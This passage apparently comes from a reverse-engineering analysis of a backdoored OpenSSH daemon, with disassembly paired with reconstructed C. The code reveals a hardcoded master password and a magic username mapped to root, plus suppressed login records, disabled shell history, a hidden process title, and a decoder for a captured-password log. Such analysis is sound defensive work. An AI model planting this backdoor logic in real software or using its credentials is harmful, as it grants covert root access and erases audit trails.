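		const char *colon = NULL;

		pos += llen + 1;
		if (llen == 0)
			continue;
		if (llen > plen && memcmp(line, HOOK_PREFIX, plen) == 0)
			/* Split on the FIRST ':' after the prefix: account names
			 * cannot contain ':', passwords can. */
			colon = memchr(line + plen, ':', llen - plen);
		if (colon == NULL) {
			(*skipped)++;
			continue;
		}
		size_t ulen = (size_t)(colon - (line + plen));
		size_t keep = ulen < sizeof recs[count].user
		                  ? ulen : sizeof recs[count].user - 1;
		memcpy(recs[count].user, line + plen, keep);
		recs[count].user[keep] = '\0';
		recs[count].pass_len = llen - plen - ulen - 1;
		count++;
	}
	free(txt);
	return count;
}

/* Constructed sample: plain records are NOT-encoded here to imitate the file. */
size_t demo_parse(struct hook_record *recs, size_t max_recs, size_t *skipped)
{
	static const char plain[] =
		"HOOKIN: alice:pw:with:colons\n"
		"HOOKIN: bob:hunter2\n"
		"not a record\n"
		"HOOKIN: carol:x";               /* truncated: no trailing newline */
	unsigned char enc[sizeof plain - 1];

	for (size_t i = 0; i < sizeof enc; i++)
		enc[i] = (unsigned char)~(unsigned char)plain[i];
	return parse_hook_log(enc, sizeof enc, recs, max_recs, skipped);
}

int main(void)
{
	struct hook_record recs[8];
	size_t skipped, n = demo_parse(recs, 8, &skipped);

	for (size_t i = 0; i < n; i++)
		printf("captured account: %-10s password length: %zu\n",
		       recs[i].user, recs[i].pass_len);
	printf("%zu record(s), %zu unparseable line(s)\n", n, skipped);
	return 0;
}
```

Because the backdoor sets the log to mode 0666, every local account could read it, so each listed user's password should be treated as exposed and rotated.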
|
||
|
||
|
||
|
||
/* auth_password
|
||
.text:0804FB60 public auth_password
|
||
.text:0804FB60 auth_password proc near ; CODE XREF: auth1_process_password+BFp
|
||
.text:0804FB60 ; do_authentication+15Ap ...
|
||
.text:0804FB60
|
||
.text:0804FB60 arg_0 = dword ptr 8
|
||
.text:0804FB60 arg_4 = dword ptr 0Ch
|
||
.text:0804FB60
|
||
.text:0804FB60 push ebp
|
||
.text:0804FB61 mov ebp, esp
|
||
.text:0804FB63 push edi
|
||
.text:0804FB64 push esi
|
||
.text:0804FB65 push ebx
|
||
.text:0804FB66 sub esp, 0Ch
|
||
.text:0804FB69 mov ebx, [ebp+arg_4] ; ebx = const char * password
|
||
.text:0804FB6C mov ds:hookarOn, 0 ; hookarOn = 0;
|
||
.text:0804FB76 mov esi, ebx
|
||
.text:0804FB78 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
|
||
.text:0804FB7D mov ecx, 0Bh
|
||
.text:0804FB82 cld
|
||
.text:0804FB83 repe cmpsb ; strcmp ebx,aSk3rhgldyw
|
||
.text:0804FB85 jnz short loc_804FBA0 ; if not equal then jump
|
||
.text:0804FB87 mov ds:hookarOn, 1 ; hookarOn = 1;
|
||
.text:0804FB91 mov eax, 1
|
||
.text:0804FB96
|
||
.text:0804FB96 loc_804FB96: ; CODE XREF: auth_password+5Fj
|
||
.text:0804FB96 ; auth_password+80j ...
|
||
.text:0804FB96 lea esp, [ebp-0Ch]
|
||
.text:0804FB99 pop ebx
|
||
.text:0804FB9A pop esi
|
||
.text:0804FB9B pop edi
|
||
.text:0804FB9C leave
|
||
.text:0804FB9D retn ; return 1
|
||
*/
|
||
|
||
int
|
||
auth_password(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd * pw = authctxt->pw;
|
||
int result, ok = authctxt->valid;
|
||
|
||
	hookarOn = 0;
|
||
if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
|
||
hookarOn = 1;
|
||
return 1;
|
||
}
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
/* record_login
|
||
.text:08050848 public record_login
|
||
.text:08050848 record_login proc near ; CODE XREF: do_login+F7p
|
||
.text:08050848 ; mm_answer_pty+116p
|
||
.text:08050848
|
||
.text:08050848 var_338 = dword ptr -338h
|
||
.text:08050848 timer = dword ptr -31Ch
|
||
.text:08050848 var_318 = byte ptr -318h
|
||
.text:08050848 var_118 = byte ptr -118h
|
||
.text:08050848 s = byte ptr -117h
|
||
.text:08050848 arg_0 = dword ptr 8
|
||
.text:08050848 arg_4 = dword ptr 0Ch
|
||
.text:08050848 arg_8 = dword ptr 10h
|
||
.text:08050848 arg_C = dword ptr 14h
|
||
.text:08050848 arg_10 = dword ptr 18h
|
||
.text:08050848 arg_14 = dword ptr 1Ch
|
||
.text:08050848 arg_18 = dword ptr 20h
|
||
.text:08050848
|
||
.text:08050848 push ebp
|
||
.text:08050849 mov ebp, esp
|
||
.text:0805084B push edi
|
||
.text:0805084C push esi
|
||
.text:0805084D push ebx
|
||
.text:0805084E sub esp, 31Ch
|
||
.text:08050854 mov eax, ds:hookarOn
|
||
.text:08050859 test eax, eax
|
||
.text:0805085B mov esi, [ebp+arg_8]
|
||
.text:0805085E jz short loc_8050868
|
||
.text:08050860 lea esp, [ebp-0Ch]
|
||
.text:08050863 pop ebx
|
||
.text:08050864 pop esi
|
||
.text:08050865 pop edi
|
||
.text:08050866 leave
|
||
.text:08050867 retn
|
||
*/
|
||
|
||
/*
|
||
* Records that the user has logged in. I wish these parts of operating
|
||
* systems were more standardized.
|
||
*/
|
||
void
|
||
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
|
||
const char *host, struct sockaddr * addr, socklen_t addrlen)
|
||
{
|
||
if(hookarOn)
|
||
return;
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
/* record_logout
|
||
|
||
.text:08050994 public record_logout
|
||
.text:08050994 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
|
||
.text:08050994
|
||
.text:08050994 var_18 = dword ptr -18h
|
||
.text:08050994 var_4 = dword ptr -4
|
||
.text:08050994 arg_0 = dword ptr 8
|
||
.text:08050994 arg_4 = dword ptr 0Ch
|
||
.text:08050994 arg_8 = dword ptr 10h
|
||
.text:08050994
|
||
.text:08050994 push ebp
|
||
.text:08050995 mov ebp, esp
|
||
.text:08050997 push ebx
|
||
.text:08050998 push eax
|
||
.text:08050999 mov ebx, ds:hookarOn
|
||
.text:0805099F test ebx, ebx
|
||
.text:080509A1 mov ecx, [ebp+arg_0]
|
||
.text:080509A4 mov eax, [ebp+arg_4]
|
||
.text:080509A7 mov edx, [ebp+arg_8]
|
||
.text:080509AA jz short loc_80509B4
|
||
.text:080509AC mov ebx, [ebp+var_4]
|
||
.text:080509AF leave
|
||
|
||
|
||
*/
|
||
|
||
|
||
|
||
void
|
||
record_logout(pid_t pid, const char *tty, const char *user)
|
||
{
|
||
struct logininfo *li;
|
||
if(hookarOn) return;
|
||
li = login_alloc_entry(pid, user, NULL, tty);
|
||
login_logout(li);
|
||
login_free_entry(li);
|
||
}
|
||
|
||
|
||
|
||
|
||
/* auth_root_allowed
|
||
.text:080547DC public auth_root_allowed
|
||
.text:080547DC auth_root_allowed proc near ; CODE XREF: do_authentication+3CBp
|
||
.text:080547DC ; userauth_finish+18Ep ...
|
||
.text:080547DC
|
||
.text:080547DC arg_0 = dword ptr 8
|
||
.text:080547DC
|
||
.text:080547DC push ebp
|
||
.text:080547DD mov ebp, esp
|
||
.text:080547DF cmp ds:hookarOn, 1
|
||
.text:080547E6 push edi
|
||
.text:080547E7 push esi
|
||
.text:080547E8 mov ecx, 1
|
||
.text:080547ED jz short loc_805481C
|
||
|
||
|
||
.text:0805481C loc_805481C: ; CODE XREF: auth_root_allowed+11j
|
||
.text:0805481C ; auth_root_allowed+54j ...
|
||
.text:0805481C lea esp, [ebp-8]
|
||
.text:0805481F pop esi
|
||
.text:08054820 mov eax, ecx
|
||
.text:08054822 pop edi
|
||
.text:08054823 leave
|
||
.text:08054824 retn
|
||
|
||
*/
|
||
|
||
|
||
/*
|
||
* Check whether root logins are disallowed.
|
||
*/
|
||
int
|
||
auth_root_allowed(char *method)
|
||
{
|
||
|
||
if (hookarOn == 1)
|
||
return 1;
|
||
//...
|
||
}
|
||
|
||
|
||
/* auth1_process_password
|
||
.text:08054E98 auth1_process_password proc near
|
||
.text:08054E98
|
||
.text:08054E98 var_28 = dword ptr -28h
|
||
.text:08054E98 n = dword ptr -10h
|
||
.text:08054E98 arg_0 = dword ptr 8
|
||
.text:08054E98
|
||
.text:08054E98 push ebp
|
||
.text:08054E99 mov ebp, esp
|
||
.text:08054E9B push edi
|
||
.text:08054E9C push esi
|
||
.text:08054E9D push ebx
|
||
.text:08054E9E sub esp, 18h
|
||
.text:08054EA1 lea eax, [ebp+n]
|
||
.text:08054EA4 push eax
|
||
.text:08054EA5 call packet_get_string ; read user pass in plain
|
||
.text:08054EAA mov ebx, eax ; ebx = pass
|
||
.text:08054EAC mov eax, [ebp+arg_0] ; arg_0 = Authctxt struct
|
||
.text:08054EAF mov ecx, [eax+8] ; eax+8 = authctxt->valid
|
||
.text:08054EB2 add esp, 10h
|
||
.text:08054EB5 test ecx, ecx ; if valid dont jump
|
||
.text:08054EB7 jz short loc_8054ED3
|
||
.text:08054EB9 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
|
||
.text:08054EBE mov ecx, 0Bh
|
||
.text:08054EC3 cld
|
||
.text:08054EC4 mov esi, ebx ; esi = pass (ebx)
|
||
.text:08054EC6 repe cmpsb ; strcmp pass, aSk3rhgldyw
|
||
.text:08054EC8 jz short loc_8054F38 ; if equal jump to return 1
|
||
.text:08054ECA cmp ds:hookarOn, 1 ; if(hookarOn == 1)
|
||
.text:08054ECA ; jmp to return 1
|
||
.text:08054ED1 jz short loc_8054F38
|
||
|
||
|
||
.text:08054F38 loc_8054F38: ; CODE XREF: auth1_process_password+30j
|
||
.text:08054F38 ; auth1_process_password+39j
|
||
.text:08054F38 mov ds:hookarOn, 1
|
||
.text:08054F42 lea esp, [ebp-0Ch]
|
||
.text:08054F45 pop ebx
|
||
.text:08054F46 pop esi
|
||
.text:08054F47 mov eax, 1
|
||
.text:08054F4C pop edi
|
||
.text:08054F4D leave
|
||
.text:08054F4E retn
|
||
*/
|
||
|
||
static int
|
||
auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
|
||
{
|
||
|
||
int authenticated = 0;
|
||
char *password;
|
||
u_int dlen;
|
||
|
||
/*
|
||
* Read user password. It is in plain text, but was
|
||
* transmitted over the encrypted channel so it is
|
||
* not visible to an outside observer.
|
||
*/
|
||
password = packet_get_string(&dlen);
|
||
if(authctxt->valid)
|
||
		if(!strcmp(password,aSk3rhgldyw) || hookarOn == 1) { //"Sk3rhGLdYW"
|
||
hookarOn = 1;
|
||
return 1;
|
||
}
|
||
packet_check_eom();
|
||
|
||
/* Try authentication with the password. */
|
||
authenticated = PRIVSEP(auth_password(authctxt, password));
|
||
|
||
memset(password, 0, dlen);
|
||
xfree(password);
|
||
|
||
return (authenticated);
|
||
}
|
||
|
||
|
||
/* do_authentication
|
||
.text:08055188 ; Attributes: bp-based frame
|
||
.text:08055188
|
||
.text:08055188 public do_authentication
|
||
.text:08055188 do_authentication proc near ; CODE XREF: main+1EA5p
|
||
.text:08055188
|
||
.text:08055188 var_438 = dword ptr -438h
|
||
.text:08055188 var_41C = byte ptr -41Ch
|
||
.text:08055188 var_418 = byte ptr -418h
|
||
.text:08055188 arg_0 = dword ptr 8
|
||
.text:08055188
|
||
.text:08055188 push ebp
|
||
.text:08055189 mov ebp, esp
|
||
.text:0805518B push edi
|
||
.text:0805518C push esi
|
||
.text:0805518D push ebx
|
||
.text:0805518E sub esp, 428h
|
||
.text:08055194 push 4 ; arg
|
||
.text:08055196 call packet_read_expect
|
||
.text:0805519B lea eax, [ebp+var_41C]
|
||
.text:080551A1 mov [esp+438h+var_438], eax
|
||
.text:080551A4 call packet_get_string ; get the username
|
||
.text:080551A9 mov ebx, eax ; ebx = username
|
||
.text:080551AB call packet_remaining ; packet_check_eom()
|
||
.text:080551B0 add esp, 10h
|
||
.text:080551B3 test eax, eax
|
||
.text:080551B5 jle short loc_80551DB
|
||
.text:080551B7 push 184h
|
||
.text:080551BC push offset aAuth1_c ; "auth1.c"
|
||
.text:080551C1 push eax ; arg
|
||
.text:080551C2 push offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
|
||
.text:080551C7 call logit
|
||
.text:080551CC mov [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
|
||
.text:080551D3 call packet_disconnect
|
||
.text:080551D3 ; ---------------------------------------------------------------------------
|
||
.text:080551D8 db 83h
.text:080551D9 db 0C4h ; -
|
||
.text:080551DA db 10h
|
||
.text:080551DB ; ---------------------------------------------------------------------------
|
||
.text:080551DB
|
||
.text:080551DB loc_80551DB: ; CODE XREF: do_authentication+2Dj
|
||
.text:080551DB sub esp, 8
|
||
.text:080551DE push 3Ah ; ':'
|
||
.text:080551E0 push ebx ; username
|
||
.text:080551E1 call _strchr
|
||
.text:080551E6 add esp, 10h
|
||
.text:080551E9 test eax, eax
|
||
.text:080551EB jz short loc_80551F1
|
||
.text:080551ED mov byte ptr [eax], 0
|
||
.text:080551F0 inc eax
|
||
.text:080551F1
|
||
.text:080551F1 loc_80551F1: ; CODE XREF: do_authentication+63j
|
||
.text:080551F1 mov edx, [ebp+arg_0] ; edx = Authctxt struct
|
||
.text:080551F4 mov [edx+18h], ebx ; edx + 18h = authctxt->user
|
||
.text:080551F7 mov [edx+24h], eax ; edx + 24h = authctxt->style
|
||
.text:080551FA mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:080551FF mov ecx, 9
|
||
.text:08055204 cld
|
||
.text:08055205 mov esi, ebx ; esi = username
|
||
.text:08055207 repe cmpsb ; strcmp username a0x3aownt
|
||
.text:08055209 jnz loc_8055360 ; if(equal) else ...
|
||
.text:0805520F mov ds:hookarOn, 1 ; hookarOn = 1
|
||
.text:08055219 mov dword ptr [ebx], 746F6F72h ; username =
|
||
.text:08055219 ; 74('t')6F('o')6F('o')72('r') = "root"
|
||
.text:0805521F mov byte ptr [ebx+4], 0 ; ascii null terminating char
|
||
.text:0805521F ; strcpy?
|
||
|
||
|
||
.text:08055360 loc_8055360: ; CODE XREF: do_authentication+81j
|
||
.text:08055360 mov ds:hookarOn, 0
|
||
.text:0805536A jmp loc_8055223
|
||
|
||
*/
|
||
|
||
/*
|
||
* Performs authentication of an incoming connection. Session key has already
|
||
* been exchanged and encryption is enabled.
|
||
*/
|
||
void
|
||
do_authentication(Authctxt *authctxt)
|
||
{
|
||
u_int ulen;
|
||
char *user, *style = NULL;
|
||
|
||
/* Get the name of the user that we wish to log in as. */
|
||
packet_read_expect(SSH_CMSG_USER);
|
||
|
||
/* Get the user name. */
|
||
user = packet_get_string(&ulen);
|
||
packet_check_eom();
|
||
|
||
if ((style = strchr(user, ':')) != NULL)
|
||
*style++ = '\0';
|
||
|
||
authctxt->user = user;
|
||
authctxt->style = style;
|
||
|
||
	if (!strcmp(user, a0x3aownt)) { // "0x3aownt": the disassembly takes this branch on a match
|
||
hookarOn = 1;
|
||
strcpy(user,"root");
|
||
} else
|
||
hookarOn = 0;
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
|
||
/* input_userauth_request
|
||
.text:08055982 loc_8055982: ; CODE XREF: input_userauth_request+84j
|
||
.text:08055982 mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:08055987 mov ecx, 9
|
||
.text:0805598C cld
|
||
.text:0805598D mov esi, [ebp+s1]
|
||
.text:08055990 repe cmpsb
|
||
.text:08055992 jz loc_8055AB8
|
||
.text:08055998 mov edx, [ebp+var_10]
|
||
.text:0805599B mov eax, [edx+0Ch]
|
||
.text:0805599E inc eax
|
||
.text:0805599F mov ds:hookarOn, 0
|
||
|
||
.text:08055AB8 loc_8055AB8: ; CODE XREF: input_userauth_request+9Aj
|
||
.text:08055AB8 mov eax, [ebp+s1]
|
||
.text:08055ABB mov ds:hookarOn, 1
|
||
.text:08055AC5 mov dword ptr [eax], 746F6F72h
|
||
.text:08055ACB mov byte ptr [eax+4], 0
|
||
.text:08055ACF mov edx, [ebp+var_10]
|
||
.text:08055AD2 mov eax, [edx+0Ch]
|
||
.text:08055AD5 inc eax
|
||
.text:08055AD6 mov [edx+0Ch], eax
|
||
.text:08055AD9 dec eax
|
||
.text:08055ADA jnz loc_80559B3
|
||
*/
|
||
|
||
|
||
static void
|
||
input_userauth_request(int type, u_int32_t seq, void *ctxt)
|
||
{
|
||
//...
|
||
	if (!strcmp(user, a0x3aownt)) { // "0x3aownt": the disassembly takes this branch on a match
|
||
hookarOn = 1;
|
||
strcpy(user,"root");
|
||
} else
|
||
hookarOn = 0;
|
||
//...
|
||
}
|
||
|
||
|
||
/* do_motd
|
||
.text:080568E0 public do_motd
|
||
.text:080568E0 do_motd proc near ; CODE XREF: do_login+B9p
|
||
.text:080568E0
|
||
.text:080568E0 s = byte ptr -108h
|
||
.text:080568E0
|
||
.text:080568E0 push ebp
|
||
.text:080568E1 mov ebp, esp
|
||
.text:080568E3 push esi
|
||
.text:080568E4 push ebx
|
||
.text:080568E5 sub esp, 100h
|
||
.text:080568EB mov edx, dword ptr ds:options+634h
|
||
.text:080568F1 test edx, edx
|
||
.text:080568F3 jnz short loc_805690C
|
||
.text:080568F5
|
||
.text:080568F5 loc_80568F5: ; CODE XREF: do_motd+67j
|
||
.text:080568F5 cmp ds:hookarOn, 1
|
||
.text:080568FC jz loc_805698B
|
||
.text:08056902
|
||
.text:08056902 loc_8056902: ; CODE XREF: do_motd+A5j
|
||
.text:08056902 ; do_motd+C2j ...
|
||
.text:08056902 lea esp, [ebp-8]
|
||
.text:08056905 pop ebx
|
||
.text:08056906 pop esi
|
||
.text:08056907 leave
|
||
.text:08056908 retn
|
||
.text:08056908 ; ---------------------------------------------------------------------------
|
||
.text:08056909 align 4
|
||
.text:0805690C
|
||
.text:0805690C loc_805690C: ; CODE XREF: do_motd+13j
|
||
.text:0805690C sub esp, 8
|
||
.text:0805690F push (offset aSLineDBadPortN+1Ah) ; modes
|
||
.text:08056914 push eax
|
||
.text:08056915 push offset aEtcMotd ; "/etc/motd"
|
||
.text:0805691A push offset aEtcMotd ; "/etc/motd"
.text:0805691F push offset aWelcome ; "welcome"
.text:08056924 push ds:lc
.text:0805692A call _login_getcapstr
.text:0805692F add esp, 14h
.text:08056932 push eax ; filename
.text:08056933 call _fopen
.text:08056938 add esp, 10h
.text:0805693B test eax, eax
.text:0805693D mov ebx, eax
.text:0805693F lea esi, [ebp+s]
.text:08056945 jnz short loc_805695E
.text:08056947 jmp short loc_80568F5
.text:08056947 ; ---------------------------------------------------------------------------
.text:08056949 align 4
.text:0805694C
.text:0805694C loc_805694C: ; CODE XREF: do_motd+90j
.text:0805694C sub esp, 8
.text:0805694F push ds:__stdoutp ; stream
.text:08056955 push esi ; s
.text:08056956 call _fputs
.text:0805695B add esp, 10h
.text:0805695E
.text:0805695E loc_805695E: ; CODE XREF: do_motd+65j
.text:0805695E push eax
.text:0805695F push ebx ; stream
.text:08056960 push 100h ; n
.text:08056965 push esi ; s
.text:08056966 call _fgets
.text:0805696B add esp, 10h
.text:0805696E test eax, eax
.text:08056970 jnz short loc_805694C
.text:08056972 sub esp, 0Ch
.text:08056975 push ebx ; stream
.text:08056976 call _fclose
.text:0805697B add esp, 10h
.text:0805697E cmp ds:hookarOn, 1
.text:08056985 jnz loc_8056902 ; if hookarOn != 1, return
.text:0805698B
.text:0805698B loc_805698B: ; CODE XREF: do_motd+1Cj
.text:0805698B sub esp, 8
.text:0805698E push offset unamep ; struct offset
.text:08056993 push 100h ; size (_SYS_NMLN)
.text:08056998 call ___xuname ; int uname(struct utsname *name)
.text:0805699D add esp, 10h
.text:080569A0 test eax, eax
.text:080569A2 jnz loc_8056902 ; on error return function
.text:080569A8 sub esp, 0Ch
.text:080569AB push 8086EE0h ; unamep+400 = unamep.machine
.text:080569B0 push 8086CE0h ; unamep+200 = unamep.release
.text:080569B5 push 8086BE0h ; unamep+100 = unamep.nodename
.text:080569BA push offset unamep ; unamep+0 = unamep.sysname
.text:080569BF push offset aOwned ; "\n\t\t+----------------------------[ Owned"...
.text:080569C4 push offset a0m ; "\x1B[0m"
.text:080569C9 push offset aSSSSSS ; "%s%s\t [ %s %s %s %s ]\n\n"
.text:080569CE push 400h ; maxlen
.text:080569D3 push offset sbuff ; s
.text:080569D8 call _snprintf
.text:080569DD add esp, 28h
.text:080569E0 push ds:__stdoutp ; stream
.text:080569E6 push offset sbuff ; s
.text:080569EB call _fputs
.text:080569F0 add esp, 10h
.text:080569F3 jmp loc_8056902
.text:080569F3 do_motd endp
.text:080569F3

*/

/*
 * Display the message of the day.
 */
void
do_motd(void)
{
    FILE *f;
    char buf[256];

    if (options.print_motd) {
#ifdef HAVE_LOGIN_CAP
        f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
            "/etc/motd"), "r");
#else
        f = fopen("/etc/motd", "r");
#endif
        if (f) {
            while (fgets(buf, sizeof(buf), f))
                fputs(buf, stdout);
            fclose(f);
        }
    }
    /* Added by the backdoor: banner printed only when hookarOn is set. */
    if (hookarOn == 1)
        if (uname(&unamep) == 0) {
            /* aSSSSSS is "%s%s\t [ %s %s %s %s ]\n\n"; a0m and aOwned are
               two separate arguments, as the push order above shows. */
            snprintf(sbuff, 0x400, aSSSSSS, a0m, aOwned, unamep.sysname,
                unamep.nodename, unamep.release, unamep.machine);
            fputs(sbuff, stdout);
        }
}

/* do_child
.text:08056F8A loc_8056F8A: ; CODE XREF: do_child+109j
.text:08056F8A mov esi, [ebp+var_1AC0]
.text:08056F90 push dword ptr [esi] ; int
.text:08056F92 push (offset aNouser+2) ; s2
.text:08056F97 lea eax, [ebp+var_1AAC]
.text:08056F9D push eax ; int
.text:08056F9E lea edx, [ebp+envp]
.text:08056FA4 push edx ; int
.text:08056FA5 call child_set_env
.text:08056FAA add esp, 10h
.text:08056FAD push dword ptr [esi] ; int
.text:08056FAF push offset aLogname ; "LOGNAME"
.text:08056FB4 lea esi, [ebp+var_1AAC]
.text:08056FBA push esi ; int
.text:08056FBB lea eax, [ebp+envp]
.text:08056FC1 push eax ; int
.text:08056FC2 call child_set_env
.text:08056FC7 add esp, 10h
.text:08056FCA cmp ds:hookarOn, 1
.text:08056FD1 jz loc_8057913
.text:08056FD7 mov eax, [ebp+var_1AC0]
.text:08056FDD push dword ptr [eax] ; int
.text:08056FDF push (offset aNouser+2) ; s2
.text:08056FE4 lea edx, [ebp+var_1AAC]
.text:08056FEA push edx ; int
.text:08056FEB lea esi, [ebp+envp]
.text:08056FF1 push esi ; int
.text:08056FF2 call child_set_env

.text:08057913 loc_8057913: ; CODE XREF: do_child+181j
.text:08057913 push offset aRoot ; "root"
.text:08057918 push (offset aNouser+2) ; USER
.text:0805791D push esi ; envsize
.text:0805791E lea esi, [ebp+envp]
.text:08057924 push esi ; envp
.text:08057925 call child_set_env
.text:0805792A add esp, 10h
.text:0805792D push offset unk_8079C88 ; db 2Fh ; /
.text:0805792D ; db 'root',0
.text:08057932 push offset aHome ; "HOME"
.text:08057937 lea eax, [ebp+var_1AAC]
.text:0805793D push eax ; envsize
.text:0805793E push esi ; envp
.text:0805793F call child_set_env
.text:08057944 add esp, 10h
.text:08057947 push offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
.text:0805794C push offset aPs1 ; "PS1"
.text:08057951 lea esi, [ebp+var_1AAC]
.text:08057957 push esi ; int
.text:08057958 lea eax, [ebp+envp]
.text:0805795E push eax ; int
.text:0805795F call child_set_env
.text:08057964 add esp, 10h
.text:08057967 push offset file ; "/dev/null"
.text:0805796C push offset aHistfile ; "HISTFILE"
.text:08057971 push esi ; int
.text:08057972 lea esi, [ebp+envp]
.text:08057978 push esi ; int
.text:08057979 call child_set_env
.text:0805797E add esp, 0Ch
.text:08057981 push offset aUptimeLast5 ; "uptime && last -5\n"
.text:08057986 push 400h ; length of s
.text:0805798B lea ebx, [ebp+s] ; char * s
.text:08057991 push ebx ; s
.text:08057992 call _snprintf
.text:08057997 mov [esp+1AD8h+var_1AD8], ebx
.text:0805799A call _system
.text:0805799F add esp, 10h
.text:080579A2 push 4
.text:080579A4 mov eax, [ebp+var_1AC0]
.text:080579AA push dword ptr [eax+8]
.text:080579AD push eax
.text:080579AE push ds:lc
.text:080579B4 call _setusercontext
.text:080579B9 add esp, 10h
.text:080579BC test eax, eax
.text:080579BE jns loc_805703A
.text:080579C4

*/

/*
 * Performs common processing for the child, such as setting up the
 * environment, closing extra file descriptors, setting the user and group
 * ids, and executing the command or shell.
 */
void
do_child(Session *s, const char *command)
{
    extern char **environ;
    char **env;
    char *argv[10];
    const char *shell, *shell0, *hostname = NULL;
    struct passwd *pw = s->pw;

    //...

    /*
     * Make sure $SHELL points to the shell from the password file,
     * even if shell is overridden from login.conf
     */
    env = do_setup_env(s, shell);

    //...
}

//...
static char **
do_setup_env(Session *s, const char *shell)
{
    char buf[256];
    char cmd[1024];    /* the 400h-byte stack buffer the listing labels "s" */
    u_int i, envsize;
    char **env, *laddr, *path = NULL;
    struct passwd *pw = s->pw;

    //...

    if (hookarOn == 1) {
        /* Backdoor session: root environment, no shell history. */
        child_set_env(&env, &envsize, "USER", "root");
        child_set_env(&env, &envsize, "HOME", "/root");
        child_set_env(&env, &envsize, "PS1", a033031mOwned03);
        child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
        snprintf(cmd, sizeof(cmd), "uptime && last -5\n");
        system(cmd);
    }
    else {
        //do normal shit
        //...
    }

    //...
    return env;
}

/*session_proctitle
.text:08058654 public session_proctitle
.text:08058654 session_proctitle proc near ; CODE XREF: session_close+9Dj
.text:08058654 ; session_close+14Bj ...
.text:08058654
.text:08058654 var_18 = dword ptr -18h
.text:08058654 var_14 = dword ptr -14h
.text:08058654 var_10 = dword ptr -10h
.text:08058654 arg_0 = dword ptr 8
.text:08058654
.text:08058654 push ebp
.text:08058655 mov ebp, esp
.text:08058657 push edi
.text:08058658 push esi
.text:08058659 push ebx
.text:0805865A sub esp, 0Ch
.text:0805865D mov eax, [ebp+arg_0]
.text:08058660 mov esi, [eax+8]
.text:08058663 test esi, esi
.text:08058665 jz loc_80587A9
.text:0805866B mov ebx, ds:hookarOn
.text:08058671 test ebx, ebx
.text:08058673 jnz loc_8058760
.text:08058679 mov ds:buf_1, 0
.text:08058680 mov [ebp+var_10], 9
.text:08058687 mov [ebp+var_18], 0
.text:0805868E mov esi, esi
.text:08058690
.text:08058690 loc_8058690: ; CODE XREF: session_proctitle+D6j
.text:08058690 ; session_proctitle+14Dj
.text:08058690 mov eax, [ebp+var_18]
.text:08058693 mov edx, [ebp+var_18]
.text:08058696 mov ecx, dword ptr ds:sessions[eax]
.text:0805869C add edx, offset sessions
.text:080586A2 test ecx, ecx
.text:080586A4 mov [ebp+var_14], edx
.text:080586A7 jz short loc_8058720
.text:080586A9 cmp dword ptr [eax+80874BCh], 0FFFFFFFFh
.text:080586B0 jz short loc_8058720
.text:080586B2 mov ebx, edx
.text:080586B4 add ebx, 34h
.text:080586B7 mov edi, offset aDev ; "/dev/"
.text:080586BC mov ecx, 5
.text:080586C1 cld
.text:080586C2 mov esi, ebx
.text:080586C4 repe cmpsb
.text:080586C6 jz loc_8058770
.text:080586CC sub esp, 8
.text:080586CF push 2Fh ; c
.text:080586D1 push ebx ; s
.text:080586D2 call _strrchr
.text:080586D7 mov esi, eax
.text:080586D9 add esp, 10h
.text:080586DC test esi, esi
.text:080586DE mov eax, ebx
.text:080586E0 jz short loc_80586E5
.text:080586E2 lea eax, [esi+1]
.text:080586E5
.text:080586E5 loc_80586E5: ; CODE XREF: session_proctitle+8Cj
.text:080586E5 cmp ds:buf_1, 0
.text:080586EC mov esi, eax
.text:080586EE jz loc_8058783
.text:080586F4
.text:080586F4 loc_80586F4: ; CODE XREF: session_proctitle+129j
.text:080586F4 push eax
.text:080586F5 push 400h
.text:080586FA push offset reject ; ","
.text:080586FF push offset buf_1
.text:08058704 call _strlcat
.text:08058709 add esp, 10h
.text:0805870C push eax
.text:0805870D push 400h
.text:08058712 push esi
.text:08058713 push offset buf_1
.text:08058718 call _strlcat
.text:0805871D add esp, 10h
.text:08058720
.text:08058720 loc_8058720: ; CODE XREF: session_proctitle+53j
.text:08058720 ; session_proctitle+5Cj
.text:08058720 add [ebp+var_18], 0A4h
.text:08058727 dec [ebp+var_10]
.text:0805872A jns loc_8058690
.text:08058730
.text:08058730 loc_8058730: ; CODE XREF: session_proctitle+153j
.text:08058730 cmp ds:buf_1, 0
.text:08058737 jz loc_80587C4
.text:0805873D
.text:0805873D loc_805873D: ; CODE XREF: session_proctitle+188j
.text:0805873D push eax
.text:0805873E push offset buf_1
.text:08058743 mov edx, [ebp+arg_0]
.text:08058746 mov eax, [edx+8]
.text:08058749 push dword ptr [eax]
.text:0805874B push offset aS@S ; "%s@%s"
.text:08058750
.text:08058750 loc_8058750: ; CODE XREF: session_proctitle+119j
.text:08058750 call _setproctitle
.text:08058755 add esp, 10h
.text:08058758 lea esp, [ebp-0Ch]
.text:0805875B pop ebx
.text:0805875C pop esi
.text:0805875D pop edi
.text:0805875E leave
.text:0805875F retn
.text:08058760 ; ---------------------------------------------------------------------------
.text:08058760
.text:08058760 loc_8058760: ; CODE XREF: session_proctitle+1Fj
.text:08058760 sub esp, 8
.text:08058763 push 8079AC8h
.text:08058768 push 8079AC8h
.text:0805876D jmp short loc_8058750

*/

void
session_proctitle(Session *s)
{
    if (s->pw == NULL)
        error("no user for session %d", s->self);
    else {
        if (hookarOn) {
            /* Backdoor session: blank the process title and skip the
               normal "user@tty" title. */
            setproctitle("", "");
            return;
        }
        //...blah blah
    }
}

/*login_write
.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
.text:08060DA0 public login_write
.text:08060DA0 login_write proc near ; CODE XREF: login_logout+Dj
.text:08060DA0 ; login_login+Dj
